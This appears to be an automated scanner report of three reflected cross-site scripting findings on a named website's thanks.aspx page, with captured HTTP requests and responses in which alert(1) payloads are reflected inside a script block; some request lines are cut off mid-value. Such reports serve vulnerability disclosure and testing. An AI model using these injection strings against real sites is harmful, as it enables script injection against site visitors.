1. Cross-site scripting (reflected)
1.1. http://www.localvisibility.org/thanks.aspx [t parameter]
1.2. http://www.localvisibility.org/thanks.aspx/ [t parameter]
1.3. http://www.localvisibility.org/thanks.aspx/ [t parameter]
Severity: | High |
Confidence: | Certain |
Host: | http://www.localvisi |
Path: | /thanks.aspx |
GET /thanks.aspx?q=5305338383 Host: www.localvisibility.org Proxy-Connection: keep-alive Referer: http://www.localvisi Cache-Control: max-age=0 Accept: application/xml User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.3 (KHTML, like Gecko) Chrome/6.0.472.63 Safari/534.3 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __utmz=69476621 |
HTTP/1.1 200 OK Cache-Control: private Date: Sat, 16 Oct 2010 19:43:22 GMT Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Vary: Accept-Encoding Content-Length: 20145 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head><title> www.local ...[SNIP]... <script type="text/javascript"> function prefixOnload() { setPrefixVal('T'); gaFormTrack('S_Lead } </script> ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.localvisi |
Path: | /thanks.aspx/ |
GET /thanks.aspx/?q Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms Accept-Language: en-US User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E) Accept-Encoding: gzip, deflate Proxy-Connection: Keep-Alive Host: www.localvisibility.org |
HTTP/1.1 200 OK Cache-Control: private Date: Sat, 16 Oct 2010 20:07:36 GMT Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: ASP.NET_SessionId Vary: Accept-Encoding Content-Length: 19963 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head><title> www.local ...[SNIP]... <script type="text/javascript"> function prefixOnload() { setPrefixVal('T'); gaFormTrack('52fa3';alert(1)/ } </script> ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.localvisi |
Path: | /thanks.aspx/ |
GET /thanks.aspx/?q Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms Accept-Language: en-US User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E) Accept-Encoding: gzip, deflate Proxy-Connection: Keep-Alive Host: www.localvisibility.org |
HTTP/1.1 200 OK Cache-Control: private Date: Sat, 16 Oct 2010 20:07:36 GMT Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: ASP.NET_SessionId Vary: Accept-Encoding Content-Length: 20063 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head><title> www.local ...[SNIP]... cript type="text/javascript"> function prefixOnload() { setPrefixVal('T'); gaFormTrack('S_Lead alert(1)//063afd63567'); } </script> ...[SNIP]... |